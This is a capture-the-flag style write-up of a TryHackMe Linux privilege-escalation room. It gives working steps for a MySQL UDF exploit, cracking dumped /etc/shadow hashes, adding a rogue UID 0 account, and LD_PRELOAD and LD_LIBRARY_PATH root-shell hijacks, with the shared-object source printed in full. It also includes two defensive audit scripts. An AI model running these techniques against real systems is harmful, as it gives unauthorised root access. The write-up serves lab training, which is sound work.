Room: https://tryhackme.com/room/linuxprivesc


Before I started with the exercises

export TERM=tmux-256color
# nicer shell shortcuts

Task 1: Literally just log in

~ ssh user@10.10.xxx.xxx -oHostKeyAlgorithms=+ssh-rsa
# password: password321
# the ip could be different so type them according to the Active Machine info
 
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Task 2: MySQL UDF exploit

The MySQL service is running as root and the “root” user for the service does not have a password assigned. We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

“Popular exploit”

Hookay, so first we start with a UDF exploit in MySQL that leads to a privesc. The exploit is so old they didn’t even assign a CVE number to it; it was from around 2006 according to exploit-db.com.

They already have all the tools in the ~/tools folder, so let’s just go ahead and jump into it.

cd ~/tools/mysql-udf
 
#compiling the exploit source with gcc
gcc -g -c raptor_udf2.c -fPIC
 
#create the shared library (so)
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 

Next, we connect to MySQL as the root account with a blank password:

mysql -u root

Then I gotta do these commands on the MySQL shell to, quote:

[…] create a User Defined Function (UDF) “do_system” using our compiled exploit:

use mysql;
 
create table foo(line blob);
 
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
 
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
 
create function do_system returns integer soname 'raptor_udf2.so';

Copy /bin/bash to /tmp and set the SUID bit on it:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Alright, after that it’s a simple matter of /tmp/rootbash -p and you are now root.

They say to remove the file though, awww :(

# rm /tmp/rootbash; exit

Task 3: Readable /etc/shadow

cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
[...]
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::

And now we have to crack hashes, great.

Firing up a Kali Linux VM and using John the Ripper, you’ll be able to recover the plaintext password and its hash type. It’s…

Tip

rockyou.txt usually sits compressed at /usr/share/wordlists/rockyou.txt.gz; decompress it with gzip -d rockyou.txt.gz

Note that gzip decompresses it in place inside /usr/share/wordlists, so you might want to copy the file and extract it elsewhere. Otherwise it’d be a little messy, and writing there needs sudo.

Task 4+5: /etc/shadow & /etc/passwd

It’s simple, login as root, generate a new password, and replace it

~ su
Password: #find it yourself!!!!
 
mkpasswd -m sha-512 newpasswordhere
# [output of the new password]
# Then replace it using nano
# I don't have to teach you how to modify a file too, right....?

The root password is now newpasswordhere

Pass that password through openssl to get a hash (openssl passwd newpasswordhere), then replace the x in root’s /etc/passwd entry with it. You also have to create another root user named newroot.

Copy root’s line, paste it as a new line, and change the name to newroot. Voila.

Then log in with the same password as above: su newroot
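Since Tasks 3 to 5 all come down to what a readable /etc/shadow or a hand-edited /etc/passwd gives away, here is a small audit script, added here and not part of the room’s tools or this writeup, that names the crypt hash behind each prefix (the $6$ that John reports as sha512crypt), converts the last-change day count, and flags a hash stored in /etc/passwd or a second UID 0 account like newroot. The sample lines are constructed with placeholder hashes; mode_is_world_readable() takes an st_mode so you can feed it os.stat("/etc/shadow").st_mode.

```python
import stat
from datetime import date, timedelta

# crypt(3) id prefix -> algorithm name, as John the Ripper labels them
HASH_PREFIXES = {"$6$": "sha512crypt", "$5$": "sha256crypt",
                 "$y$": "yescrypt", "$2b$": "bcrypt", "$1$": "md5crypt"}


def classify_hash(field):
    """Name the algorithm behind a passwd/shadow password field."""
    if field == "":
        return "empty"                  # no password at all
    if field.startswith(("*", "!")):
        return "locked"                 # no usable hash for this account
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "unknown"


def epoch_days_to_date(days):
    """Field 3 of /etc/shadow (e.g. 17298) is days since 1970-01-01."""
    return date(1970, 1, 1) + timedelta(days=int(days))


def mode_is_world_readable(mode):
    """True if an st_mode such as 0o644 lets 'other' read the file."""
    return bool(mode & stat.S_IROTH)


def audit(passwd_text, shadow_text):
    """Return (severity, account, message) tuples for the weaknesses above."""
    findings = []
    for line in passwd_text.splitlines():
        if line.strip():
            name, pw, uid = line.split(":")[:3]
            if pw not in ("x", "*"):    # a hash in passwd is readable by everyone
                findings.append(("high", name, f"{classify_hash(pw)} hash in /etc/passwd"))
            if uid == "0" and name != "root":
                findings.append(("high", name, "extra UID 0 account"))
    for line in shadow_text.splitlines():
        if line.strip():
            name, pw, lastchg = line.split(":")[:3]
            alg = classify_hash(pw)
            if alg not in ("locked", "empty"):
                findings.append(("info", name, f"{alg} hash, last changed {epoch_days_to_date(lastchg)}"))
    return findings


# Constructed sample lines with placeholder hashes, not the box's real files.
PASSWD = "root:x:0:0:root:/root:/bin/bash\nnewroot:$1$ab$PLACEHOLDER:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n"
SHADOW = "root:$6$Tb/euwmK$PLACEHOLDER:17298:0:99999:7:::\ndaemon:*:17298:0:99999:7:::\nuser:$6$M1tQjkeb$PLACEHOLDER:17298:0:99999:7:::\nmysql:!:18133:0:99999:7:::\n"
```

Calling audit(PASSWD, SHADOW) on the samples yields two high findings for newroot and an info line per account that still has a live hash.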

Task 6: Sudo - Shell Escape Sequences

We’re gonna use GTFOBins for the next task(s).

If the program is listed with “sudo” as a function, you can use it to elevate privileges, usually via an escape sequence.

Q: How many programs is “user” allowed to run via sudo? A: A heck of a lot!! Run sudo -l yourself and find out!

Task 7: Sudo - Environment Variables

Quote from this task

Sudo can be configured to inherit certain environment variables from the user’s environment. Check which environment variables are inherited (look for the env_keep options):

sudo -l

That seems correct.

Quote

  • LD_PRELOAD loads a shared object before any others when a program is run.
  • LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

There’re a few writeups and articles about this lying around. I’m just gonna link some here if you’re interested:

Create a shared object using the code located at /home/user/tools/sudo/preload.c:

~ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

preload.c content (the missing # and straight quotes restored; the <unistd.h> include and _GNU_SOURCE that setresuid() needs are added here)

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}

I think I wrote something about the -fPIC flag up there, so I’m not gonna explain it here. Just follow the instructions.

After that, just run sudo LD_PRELOAD=/tmp/preload.so program-name-here, picking a program from the sudo -l list above. We should have a root shell.
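To make the env_keep point from the quote concrete, here is a parser for sudo -l output, an added example rather than anything from the room or this writeup, that reports how many commands a user may run (the Task 6 question) and which dynamic-loader variables env_keep lets past env_reset. The WEAK and FIXED samples are constructed, not the real box’s output; FIXED shows the Defaults line an admin would want instead.

```python
import re

# Loader variables; if sudo keeps them, the caller picks code the root process loads.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}


def parse_sudo_l(output):
    """Split `sudo -l` text into its Defaults entries and its command lines."""
    defaults, commands, section = [], [], None
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
        elif "may run the following commands" in line:
            section = "commands"
        elif not line:
            section = None                      # a blank line ends a section
        elif section == "defaults":
            defaults.extend(d.strip() for d in line.rstrip(",").split(","))
        elif section == "commands" and line.startswith("("):
            commands.append(line)
    return defaults, commands


def kept_loader_vars(defaults):
    """Loader variables that an env_keep entry lets through env_reset."""
    kept = set()
    for entry in defaults:
        m = re.match(r'env_keep\+?="?([^"]+)"?$', entry)
        if m:
            kept.update(v for v in m.group(1).split() if v in LOADER_VARS)
    return kept


def assess(output):
    """Summarise one user's sudo grant for review."""
    defaults, commands = parse_sudo_l(output)
    return {"commands": len(commands),
            "nopasswd": sum("NOPASSWD:" in c for c in commands),
            "loader_vars_kept": sorted(kept_loader_vars(defaults))}


# Constructed sudo -l output: WEAK keeps both loader variables, FIXED does not.
WEAK = """Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/sbin/apache2
"""
FIXED = WEAK.replace(", env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH", ", mail_badpass")
```

Feed it the real output of sudo -l on the box and assess() tells you at a glance whether the loader variables are kept.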

Run ldd against the apache2 program file to see which shared libraries are used by the program:

ldd /usr/sbin/apache2

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

~ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):

~ sudo LD_LIBRARY_PATH=/tmp apache2

A root shell should spawn.

The question at the bottom

Try renaming /tmp/libcrypt.so.1 to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.